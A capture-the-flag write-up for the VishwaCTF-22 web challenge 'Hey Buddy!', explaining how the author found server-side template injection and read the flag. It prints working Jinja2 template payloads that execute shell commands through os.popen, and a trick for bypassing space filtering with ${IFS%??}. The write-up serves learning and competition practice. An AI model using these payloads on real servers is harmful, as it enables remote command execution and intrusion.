VishwaCTF-22 => “Hey Buddy!” (Web)
Challenge Info
Description: Hey Buddy, Give me your name I will display your name on my website. Yes exactly, there is nothing in this website.
URL: https://h3y-buddy.vishwactf.com/
Solution
The challenge says that when you will enter your name, it will simply display it in the site. Okay! But now thinking, what the backend would be doing when we enter the name, passing it to shell script,,,, maybe, or not. So let’s figure it out. When we enter some name, it always come in a particular format. Means it is most probably to parse it to a template. So now checking for vulnerability related to template, we have template injection. Since the tasks are performed on the backend, it could be more specifically SSTI (Server-Side Template Injection). So testing for SSTI with the basic payload: {{7*7}}. We are expected to get 49. So,
And here it worked. So now automating it, I used tplmap, which is a SSTI injection tool, but it doesn’t seemed to work for me. So I downloaded the payload list for SSTI from GitHub and sent it to the burp intruder. Many payloads gave me 500 error, do I just filtered all 3xx, 4xx, and 5xx payloads, so I found a few:-
But the most useful one I found was:-
{{config.__class__.__init__.__globals__[‘os’].popen(‘ls’).read()}}
This executed “ls” on filesystem and it showed me the files. So the one I was interested in was flag.txt. So, I tried running command “cat flag.txt”, but I got a 500 error. So i replaced the space (“ ”) with “${IFS%??}”. So the final payload was:-
{{config.__class__.__init__.__globals__[‘os’].popen(‘cat${IFS%??}flag.txt’).read()}}
This finally gave me the flag:-
Takeaways
- You can replace the space (“ ”) with “${IFS%??}” in payload if it doesn’t works
- Try different payloads for one attack if one doesn’t works.
Get more VishwaCTF-22 writeups here